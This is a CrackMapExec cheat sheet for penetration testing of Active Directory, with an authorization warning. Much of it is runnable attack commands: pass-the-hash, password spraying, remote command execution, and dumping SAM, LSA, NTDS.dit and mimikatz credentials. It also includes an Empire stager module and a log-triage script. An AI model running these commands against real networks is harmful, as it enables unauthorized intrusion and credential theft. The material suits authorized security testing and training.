
CrackMapExec Cheat Sheet


Overview

CrackMapExec (CME) is a post-exploitation tool built for penetration testing and red team operations in Windows/Active Directory environments. It is often described as a "Swiss army knife" for network penetration testing: it enumerates hosts, tests credentials and executes commands over several protocols, and records every host and credential it sees in a local database.

Warning: CrackMapExec is a security testing tool and must only be used against systems you have explicit permission to test.

Installation

Using pipx (recommended)

# Install pipx if not already installed
python3 -m pip install --user pipx
python3 -m pipx ensurepath

# Install CrackMapExec
pipx install crackmapexec

On Kali Linux

sudo apt update
sudo apt install -y crackmapexec

From GitHub

git clone https://github.com/byt3bl33d3r/CrackMapExec
cd CrackMapExec
poetry install

Using Docker

docker pull byt3bl33d3r/crackmapexec
docker run -it --entrypoint=/bin/bash byt3bl33d3r/crackmapexec

Basic Usage

General syntax

crackmapexec <protocol> <target(s)> -u <username> -p <password> [options]

Supported protocols

  • smb: Server Message Block
  • winrm: Windows Remote Management
  • ldap: Lightweight Directory Access Protocol
  • mssql: Microsoft SQL Server
  • ssh: Secure Shell
  • rdp: Remote Desktop Protocol
  • ftp: File Transfer Protocol

Target specification

Targets are separated by spaces; each one may be a single host, a range, a CIDR block or a file name.

# Single target
crackmapexec smb 192.168.1.100

# Multiple targets
crackmapexec smb 192.168.1.100 192.168.1.101

# IP range
crackmapexec smb 192.168.1.1-255

# CIDR notation
crackmapexec smb 192.168.1.0/24

# From file
crackmapexec smb targets.txt

Authentication Methods

Username and password

Several usernames, passwords or hashes are given as separate arguments, not comma-separated. Unless --no-bruteforce is set, CME tries every username/password combination.

# Single username and password
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123'

# Multiple usernames
crackmapexec smb 192.168.1.0/24 -u administrator user1 -p 'Password123'

# Multiple passwords
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' 'Welcome1'

# From files
crackmapexec smb 192.168.1.0/24 -u users.txt -p passwords.txt

Pass the Hash

# NTLM hash in LM:NT form (the NT half alone also works). The value below is the
# empty-string hash, shown only as a format placeholder
crackmapexec smb 192.168.1.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0'

# Multiple hashes
crackmapexec smb 192.168.1.0/24 -u administrator -H 'hash1' 'hash2'

# From file
crackmapexec smb 192.168.1.0/24 -u administrator -H hashes.txt

Local authentication (accounts in the host's SAM rather than the domain)

crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --local-auth

Domain authentication

crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -d DOMAIN

SMB Protocol Commands

Basic enumeration

# List shares
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --shares

# List logged-on users
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --loggedon-users

# List domain users
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --users

# List domain groups
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --groups

# List local groups
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --local-groups

# Get domain password policy
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --pass-pol

# List hosts that do not require SMB signing (NTLM relay targets); no credentials needed
crackmapexec smb 192.168.1.0/24 --gen-relay-list relay_targets.txt
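Triaging the output of the enumeration commands above. The following script is an added example, not part of CrackMapExec or of this cheat sheet: it filters CME's SMB output lines to list hosts where a credential authenticated, hosts where that credential is a local administrator (CME marks those with `(Pwn3d!)`), hosts without SMB signing (the same set `--gen-relay-list` writes to a file) and hosts that still accept SMBv1. The log lines embedded in the script are constructed to match CME's SMB line format and are not real scan results; in practice you would feed it the output of `crackmapexec ... | tee cme.log`.

```shell
#!/bin/sh
# Added example, not part of CrackMapExec: triage CME SMB output with awk.
set -eu

# Constructed sample of CME SMB output (not real scan results). Columns are
# protocol, IP, port, hostname, status marker ([*] info, [+] success, [-] failure).
CME_LOG=$(cat <<'EOF'
SMB         192.168.1.100   445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         192.168.1.100   445    DC01             [+] corp.local\administrator:Password123 (Pwn3d!)
SMB         192.168.1.101   445    WS01             [*] Windows 10.0 Build 19041 x64 (name:WS01) (domain:corp.local) (signing:False) (SMBv1:True)
SMB         192.168.1.101   445    WS01             [+] corp.local\administrator:Password123
SMB         192.168.1.102   445    WS02             [*] Windows 10.0 Build 19041 x64 (name:WS02) (domain:corp.local) (signing:False) (SMBv1:False)
SMB         192.168.1.102   445    WS02             [-] corp.local\administrator:Password123 STATUS_LOGON_FAILURE
EOF
)

# Hosts where the credential authenticated ([+] lines), one IP per line.
valid_hosts() {
    printf '%s\n' "$1" | awk '$5 == "[+]" { print $2 }' | sort -u
}

# Hosts where the credential is a local administrator: CME appends "(Pwn3d!)".
admin_hosts() {
    printf '%s\n' "$1" | awk '$5 == "[+]" && /\(Pwn3d!\)/ { print $2 }' | sort -u
}

# Hosts that do not require SMB signing: NTLM relay candidates
# (the same set that --gen-relay-list writes to a file).
unsigned_hosts() {
    printf '%s\n' "$1" | awk '/\(signing:False\)/ { print $2 }' | sort -u
}

# Hosts still accepting SMBv1.
smbv1_hosts() {
    printf '%s\n' "$1" | awk '/\(SMBv1:True\)/ { print $2 }' | sort -u
}

# With a real run:  crackmapexec smb targets.txt -u user -p pass | tee cme.log
#                   admin_hosts "$(cat cme.log)"
echo "valid:";      valid_hosts "$CME_LOG"
echo "admin:";      admin_hosts "$CME_LOG"
echo "no signing:"; unsigned_hosts "$CME_LOG"
echo "smbv1:";      smbv1_hosts "$CME_LOG"
```

The filters key on the fifth column (the status marker) and on the parenthesised attributes CME prints on the banner line, so they survive changes in hostname and OS strings. If colour escape codes survive into the saved log, strip them before filtering.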

Command execution

# Execute command
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -x 'whoami'

# Execute PowerShell command
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -X '$PSVersionTable'

File operations

# Spider a share for file names containing a pattern (substring match; use --regex for a regular expression)
crackmapexec smb 192.168.1.100 -u administrator -p 'Password123' --spider C$ --pattern txt

# Download a file (the remote path is relative to --share, which defaults to C$)
crackmapexec smb 192.168.1.100 -u administrator -p 'Password123' --share C$ --get-file '\temp\file.txt' /tmp/file.txt

# Upload a file
crackmapexec smb 192.168.1.100 -u administrator -p 'Password123' --share C$ --put-file /tmp/file.txt '\temp\file.txt'

WinRM Protocol Commands

Basic enumeration

# Check WinRM access
crackmapexec winrm 192.168.1.0/24 -u administrator -p 'Password123'

Command execution

# Execute command
crackmapexec winrm 192.168.1.0/24 -u administrator -p 'Password123' -x 'whoami'

# Execute PowerShell command
crackmapexec winrm 192.168.1.0/24 -u administrator -p 'Password123' -X '$PSVersionTable'

LDAP Protocol Commands

LDAP flag names have changed between CME releases (and again in its NetExec fork); confirm the ones below with crackmapexec ldap --help before relying on them.

Basic enumeration

# Get domain information
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --domain

# List domain users
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --users

# List domain groups
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --groups

# List domain computers
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --computers

# Get domain password policy
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --pass-pol

# Get domain trusts
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --trusts

Advanced enumeration

# Read the machine account quota (ms-DS-MachineAccountQuota)
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' -M maq

# Search user description fields, which often contain passwords
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' -M get-desc-users

# Search for unconstrained delegation
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --trusted-for-delegation

# Search for constrained delegation
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --allowed-to-delegate

# Search for ASREP roastable users
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --asreproast output.txt

# Search for kerberoastable users
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --kerberoasting output.txt

MSSQL Protocol Commands

Basic enumeration

# Check MSSQL access
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123'

# List databases
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123' -q 'SELECT name FROM master.dbo.sysdatabases'

Command execution

# Execute an OS command through xp_cmdshell (CME enables it if needed)
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123' -x 'whoami'

# Execute query
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123' -q 'SELECT @@version'

Module Usage

Module management

# List available modules for a protocol
crackmapexec <protocol> -L

# Get module options
crackmapexec <protocol> -M <module> --options

# Use module
crackmapexec <protocol> <target> -u <username> -p <password> -M <module> -o OPTION1=value1 OPTION2=value2

Common modules

Module names and options vary between CME releases; crackmapexec <protocol> -L shows the ones actually installed.

Mimikatz

# Dump credentials
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='sekurlsa::logonpasswords'

# Get LSA secrets
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='lsadump::secrets'

# Get SAM database
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='lsadump::sam'

# DCSync (needs replication rights, e.g. Domain Admin; mimikatz runs on the target)
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='lsadump::dcsync /domain:domain.local /user:krbtgt'

Empire

# Generate Empire stager
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M empire_exec -o LISTENER=http

PowerView

# Run PowerView commands
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M powerview -o COMMAND='Get-NetDomain'

BloodHound

# Collect BloodHound data
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M bloodhound -o COLLECTION=All

Lsassy

# Dump credentials using lsassy
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M lsassy

Enum_DNS

# Enumerate DNS records
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M enum_dns

GOAD

GOAD (Game of Active Directory) is a vulnerable lab environment for practising the commands in this sheet, not a CME module; there is no -M goad. Use crackmapexec ldap -L to see the LDAP modules that are actually available.

Advanced Techniques

Password spraying

# Spray single password against multiple users
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Spring2023!'

# Spray multiple passwords against single user
crackmapexec smb 192.168.1.0/24 -u administrator -p passwords.txt

# Don't stop at the first hit and add a random delay between attempts. Jitter does not prevent
# lockouts: read the lockout threshold with --pass-pol first and keep attempts per user below it
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Spring2023!' --continue-on-success --jitter 10

Credential harvesting

# Dump SAM database
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --sam

# Dump LSA secrets
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --lsa

# Dump NTDS.dit
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --ntds

Database Operations

CME records every host, credential and admin relationship it discovers in a per-protocol SQLite database (default workspace under ~/.cme/workspaces/default/) on every run; no flag is needed to enable it. The cmedb shell browses it.

Browsing the database

# Open the database shell
cmedb

# Inside cmedb: list hosts and stored credentials
cmedb (default)(smb) > hosts
cmedb (default)(smb) > creds

Reusing stored credentials

# Authenticate with the credential whose database ID is 1
crackmapexec smb 192.168.1.0/24 -id 1

Common Options

| Option | Description |
|---|---|
| -h, --help | Show help message and exit |
| -t THREADS | Number of concurrent threads (default: 100) |
| --timeout TIMEOUT | Max timeout in seconds for each thread (default: none) |
| --verbose | Enable verbose output |
| --debug | Enable debug output |
| --continue-on-success | Keep trying the remaining credentials on a host after one succeeds (needed for spraying) |
| --no-bruteforce | Pair usernames and passwords line by line (user1:pass1, user2:pass2) instead of trying every combination |
| --fail-limit LIMIT | Stop attempts on a host after LIMIT failed logins (--ufail-limit is per user, --gfail-limit is global) |
| --jitter JITTER | Random delay of up to JITTER seconds between connections |
| --local-auth | Authenticate with local accounts instead of domain accounts |
| -d, --domain DOMAIN | Domain to authenticate to |
| --no-output | Do not display command output |
| --log FILE | Export results to FILE (logs are always written under ~/.cme/logs/ as well) |

Protocol-specific Options

SMB options

| Option | Description |
|---|---|
| --shares | List available shares |
| --sessions | List active sessions |
| --disks | List disks |
| --loggedon-users | List logged-on users |
| --users | List domain users |
| --groups | List domain groups |
| --local-groups | List local groups |
| --pass-pol | Get password policy (lockout threshold, reset window) |
| --rid-brute [MAX_RID] | Enumerate users by brute-forcing RIDs |
| --sam | Dump SAM hashes |
| --lsa | Dump LSA secrets |
| --ntds | Dump NTDS.dit (domain controllers) |
| --exec-method {smbexec,wmiexec,mmcexec,atexec} | Method used to execute commands |

LDAP options

| Option | Description |
|---|---|
| --users | List domain users |
| --groups | List domain groups |
| --computers | List domain computers |
| --domain | Get domain information |
| --pass-pol | Get password policy |
| --trusts | Get domain trusts |
| --asreproast [OUTFILE] | Get AS-REP roastable users |
| --kerberoasting [OUTFILE] | Get Kerberoastable users |
| --trusted-for-delegation | Get users/computers with unconstrained delegation |
| --allowed-to-delegate | Get users/computers with constrained delegation |

WinRM options

| Option | Description |
|---|---|
| --port [PORT] | WinRM port (default: 5985) |
| --ssl | Use SSL for WinRM |

MSSQL options

| Option | Description |
|---|---|
| --port [PORT] | MSSQL port (default: 1433) |
| -q QUERY | Execute a SQL query |

Resources